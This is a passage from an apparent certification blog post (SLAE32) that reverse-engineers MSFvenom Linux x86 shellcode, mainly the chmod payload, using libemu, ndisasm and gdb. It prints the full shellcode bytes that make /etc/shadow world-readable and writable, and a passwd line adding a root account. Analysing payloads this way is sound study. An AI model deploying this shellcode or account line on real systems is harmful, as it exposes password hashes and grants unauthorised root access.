is:<\/p>\n\n\n\n<p>metasploit:Az\/dIsj4p4IRc:0:0::\/:\/bin\/sh<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506074313.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We check the \/etc\/passwd file after executing this syscall and verify that the line has been appended to the file.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506074808.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To confirm that the payload worked as expected, we can also switch users with the <strong>su<\/strong> command to the newly created account, and verify that it has root permissions.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506075540.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Next, we move onto an analysis of the MSFvenom <strong>linux\/x86\/chmod<\/strong> shellcode.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Shellcode 3: linux\/x86\/chmod<\/h2>\n\n\n\n<p>According to the description provided in <strong>MSFvenom<\/strong>, the <strong>linux\/x86\/chmod<\/strong> shellcode payload is designed to run the <strong>chmod<\/strong> command on a target file with a specified mode, effectively modifying its permissions.<\/p>\n\n\n\n<p>Understanding the payload options, this shellcode specifies a <strong>file<\/strong> and a <strong>mode<\/strong> as arguments. By default, the <strong>file<\/strong> is set to <strong>\/etc\/shadow<\/strong> and the <strong>mode<\/strong> is set to <strong>0666<\/strong>, or full global permissions.<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(root\u327fkali)-&#x5B;\/opt\/libemu\/tools\/sctest]\n\u2514\u2500# msfvenom -p linux\/x86\/chmod --list-options                                                      1 \u2699\nOptions for payload\/linux\/x86\/chmod:\n=========================\n\n       Name: Linux Chmod\n     Module: payload\/linux\/x86\/chmod\n   Platform: Linux\n       Arch: x86\nNeeds Admin: No\n Total size: 36\n       Rank: Normal\n\nProvided by:\n    kris katterjohn &lt;katterjohn@gmail.com&gt;\n\nBasic options:\nName  Current Setting  Required  Description\n----  ---------------  --------  -----------\nFILE  \/etc\/shadow      yes       Filename to chmod\nMODE  0666             yes       File mode (octal)\n\nDescription:\n  Runs chmod on specified file with specified mode\n<\/pre><\/div>\n\n\n<p>To validate that this is the true functionality of the shellcode, we will perform analysis in the next section.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Emulation with Libemu<\/h3>\n\n\n\n<p>To begin, we use the <strong>sctest<\/strong> program from Libemu to emulate the <strong>linux\/x86\/chmod<\/strong> shellcode.<\/p>\n\n\n\n<p>We supply the arguments as follows:<\/p>\n\n\n\n<p><strong>msfvenom<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-p<\/strong>: Payload option set to linux\/x86\/chmod<\/li>\n\n\n\n<li><strong>R<\/strong>: Output shellcode in raw bytes<\/li>\n<\/ul>\n\n\n\n<p><strong>sctest<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>-vvv<\/strong>: Set verbosity mode to 3.<\/li>\n\n\n\n<li><strong>-S<\/strong>: Read shellcode from stdin<\/li>\n\n\n\n<li><strong>-s<\/strong>: Run for 10,000 steps<\/li>\n\n\n\n<li><strong>-G<\/strong>: Save graphical output<\/li>\n<\/ul>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/chmod R | .\/sctest -vvv -Ss 10000 -G chmod.dot\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngraph file chmod.dot\nverbose = 3\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 36 bytes\n\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417000\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417000\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 99                              cwd \n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417001\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 6A0F                            push byte 0xf\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417003\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 58                              pop eax\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417004\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fce  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 52                              push edx\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417005\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] E8                              call 0x1\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417016\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 5B                              pop ebx\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417017\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 68B6010000                      push dword 0x1b6\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x0041701c\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x00000000  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 59                              pop ecx\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x0041701d\n&#x5B;emu 0x0x4b2640 debug ] eax=0x0000000f  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] CD80                            int 0x80\nsys_chmod(2)\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x0041701f\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 6A01                            push byte 0x1\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417021\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fc6  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 58                              pop eax\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417022\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000001  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] CD80                            int 0x80\nsys_exit(2)\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417024\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \n&#x5B;emu 0x0x4b2640 debug ] 0000                            add &#x5B;eax],al\ncpu error error accessing 0x00000004 not mapped\n\nstepcount 12\ncopying vertexes\noptimizing graph\nvertex 0x513810\ngoing forwards from 0x513810\n -&gt; vertex 0x513a30\n -&gt; vertex 0x513b20\n -&gt; vertex 0x513c00\n -&gt; vertex 0x513df0\n -&gt; vertex 0x513f90\n -&gt; vertex 0x514130\n -&gt; vertex 0x5142a0\ncopying edges for 0x5142a0\n -&gt; 0x517760\nvertex 0x5144b0\ngoing forwards from 0x5144b0\ncopying edges for 0x5144b0\n -&gt; 0x517870\nvertex 0x5145d0\ngoing forwards from 0x5145d0\n -&gt; vertex 0x5147a0\ncopying edges for 0x5147a0\n -&gt; 0x517ad0\nvertex 0x514950\ngoing forwards from 0x514950\ncopying edges for 0x514950\nvertex 0x514a90\ngoing forwards from 0x514a90\ncopying edges for 0x514a90\n&#x5B;emu 0x0x4b2640 debug ] cpu state    eip=0x00417026\n&#x5B;emu 0x0x4b2640 debug ] eax=0x00000000  ecx=0x000001b6  edx=0x00000000  ebx=0x0041700a\n&#x5B;emu 0x0x4b2640 debug ] esp=0x00416fca  ebp=0x00000000  esi=0x00000000  edi=0x00000000\n&#x5B;emu 0x0x4b2640 debug ] Flags: \nERROR  chmod (\n) =  -1;\nERROR  exit (\n     int status = 4288522;\n) =  -1;\n<\/pre><\/div>\n\n\n<p>Once again, as less information is returned on this relatively small payload, we look to tools such as Ndisasm and GDB to understand how the payload is working at a low level.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Disassembly with Ndisasm<\/h3>\n\n\n\n<p>Next, we use ndisasm to disassemble the shellcode generated by MSFvenom. The payload gets broken down into its assembly instructions as follows:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/chmod R | ndisasm -u -                                                    1 \u2699\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 36 bytes\n\n00000000  99                cdq\n00000001  6A0F              push byte +0xf\n00000003  58                pop eax\n00000004  52                push edx\n00000005  E80C000000        call 0x16\n0000000A  2F                das\n0000000B  657463            gs jz 0x71\n0000000E  2F                das\n0000000F  7368              jnc 0x79\n00000011  61                popa\n00000012  646F              fs outsd\n00000014  7700              ja 0x16\n00000016  5B                pop ebx\n00000017  68B6010000        push dword 0x1b6\n0000001C  59                pop ecx\n0000001D  CD80              int 0x80\n0000001F  6A01              push byte +0x1\n00000021  58                pop eax\n00000022  CD80              int 0x80\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506084652.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>From the above output, we can focus on the syscalls that are performed. We will again backtrace this based on the value populating the <strong>EAX<\/strong> register prior to each syscall.<\/p>\n\n\n\n<p>The file \/usr\/include\/i386-linux-gnu\/asm\/unistd_32.h contains references to each syscall number.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506085237.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>From this, we pick out a list of syscalls using the following syscall numbers.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>0xf - syscall 15 - <strong>chmod<\/strong><\/li>\n\n\n\n<li>0x1 - syscall 1 - <strong>exit<\/strong><\/li>\n<\/ul>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nint chmod(const char *pathname, mode_t mode);\n<\/pre><\/div>\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: cpp; gutter: false; title: ; notranslate\" title=\"\">\nvoid exit(int status);\n<\/pre><\/div>\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Analysis with GDB<\/h3>\n\n\n\n<p>Next, we perform a dynamic analysis using gdb by stepping through the program an instruction at a time.<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Compilation and setup<\/h4>\n\n\n\n<p>Before we begin, we use MSFvenom to output the shellcode into C format:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\nmsfvenom -p linux\/x86\/chmod -f C                                                                1 \u2699\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\nNo encoder specified, outputting raw payload\nPayload size: 36 bytes\nFinal size of c file: 177 bytes\nunsigned char buf&#x5B;] = \n&quot;\\x99\\x6a\\x0f\\x58\\x52\\xe8\\x0c\\x00\\x00\\x00\\x2f\\x65\\x74\\x63\\x2f&quot;\n&quot;\\x73\\x68\\x61\\x64\\x6f\\x77\\x00\\x5b\\x68\\xb6\\x01\\x00\\x00\\x59\\xcd&quot;\n&quot;\\x80\\x6a\\x01\\x58\\xcd\\x80&quot;;\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506085822.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We then compile the shellcode with gcc:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\ngcc -fno-stack-protector -z execstack chmod_shellcode.c -o shellcode\n<\/pre><\/div>\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506085919.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, we launch gdb and set a breakpoint to the main function using the <strong>break<\/strong> command:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506163958.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We run the program, hit the main breakpoint, and disassemble the <strong>code<\/strong> variable which contains the <strong>chmod<\/strong> shellcode.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506164051.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We set the breakpoint at the start of the linux\/x86\/chmod shellcode payload so we can start going through it:<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506164641.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">chmod analysis<\/h4>\n\n\n\n<p>To begin, the syscall for <strong>chmod<\/strong> is pushed to the stack and popped into <strong>EAX<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506170409.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, using the <strong>JMP-CALL-POP<\/strong> technique, the \"\/etc\/shadow\" string is popped into the <strong>EBX<\/strong> register for the <strong>*pathname<\/strong> argument.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506170924.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>The string is popped into <strong>EBX<\/strong> register, aligning it to the syscall arguments convention.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506171245.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>Next, the value <strong>0x1b6<\/strong> is popped into the <strong>ECX<\/strong> register.<\/p>\n\n\n\n<p>According to the man page for <strong>chmod<\/strong>, the <strong>mode<\/strong> argument can be either 'symbolic representation of changes to make, or an octal number representing the bit pattern for the new mode bits'.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506171900.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>We convert the <strong>0x1b6<\/strong> value using an <a href=\"https:\/\/www.rapidtables.com\/convert\/number\/hex-to-octal.html\">online hex converter<\/a> and confirm it resolves to the octal value of <strong>666<\/strong>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506171718.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>This <strong>666<\/strong> value in Linux grants read and write permissions to everyone.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506171555.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">exit analysis<\/h3>\n\n\n\n<p>Once the call to <strong>chmod<\/strong> is made, the shellcode wraps up by calling the <strong>exit<\/strong> syscall, which gracefully exits the program.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506172153.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<p>To confirm that the payload worked as expected, we check the permissions on the \/etc\/shadow file, and verify that they have been modified as expected.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/jacklgmcbride.co.uk\/blog\/wp-content\/uploads\/2022\/05\/Pasted-image-20220506172256.png\" alt=\"\"\/><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\">Code<\/h3>\n\n\n\n<p>That concludes our analysis of the three example shellcode samples from MSFvenom.<\/p>\n\n\n\n<p>Whilst this blog post was more focused on performing analysis of existing shellcodes instead of writing code, all notes and tool outputs from this analysis can be found on my <a href=\"https:\/\/github.com\/war4uthor\/SLAE32\">GitHub repository<\/a>.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>This blog post has been created for completing the requirements of the <a href=\"https:\/\/www.pentesteracademy.com\/course?id=3\">SecurityTube Linux Assembly Expert<\/a> certification.<\/p>\n\n\n\n<p><strong>Student ID:<\/strong> PA-6483<\/p>\n\n\n\n<p>All code was tested on 32-bit Kali Linux:<\/p>\n\n\n<div class=\"wp-block-syntaxhighlighter-code \"><pre class=\"brush: bash; gutter: false; title: ; notranslate\" title=\"\">\n\u250c\u2500\u2500(jack\u327fkali)-&#x5B;~\/SLAE32\/Assignment 5: MSFvenom Shellcode Analysis]\n\u2514\u2500$ uname -a\nLinux kali 5.5.0-kali2-686-pae #1 SMP Debian 5.5.17-1kali1 (2020-04-21) i686 GNU\/Linux\n<\/pre><\/div>\n\n\n<p>In the next blog post, we will be covering polymorphism, and applying the concept to shellcode samples to improve efficiency and reduce size.<\/p>\n\n\n\n<p>Thanks for reading!<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n","protected":false},"excerpt":{"rendered":"<p>In this blog post, we will be covering our process behind reverse engineering and understanding popular shellcode payloads maintained in the payload module of the Metasploit project, MSFvenom. As this blog series is based on x86 Linux, this post will focus on payloads supporting this architecture and platform. This post is the fifth entry in&hellip;<\/p>\n","protected":false},"author":1,"featured_media":305,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[29,6,30,26,28],"tags":[27],"class_list":["post-284","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-assembly","category-certifications","category-linux","category-reverse-engineering","category-shellcoding","tag-slae32"],"_links":{"self":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/284","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/comments?post=284"}],"version-history":[{"count":17,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/284\/revisions"}],"predecessor-version":[{"id":748,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/posts\/284\/revisions\/748"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media\/305"}],"wp:attachment":[{"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/media?parent=284"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/categories?post=284"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/jacklgmcbride.co.uk\/blog\/index.php\/wp-json\/wp\/v2\/tags?post=284"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}